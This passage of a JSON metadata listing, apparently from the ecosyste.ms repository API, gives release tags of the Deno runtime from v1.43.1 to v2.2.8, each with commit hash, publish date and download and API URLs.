github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1",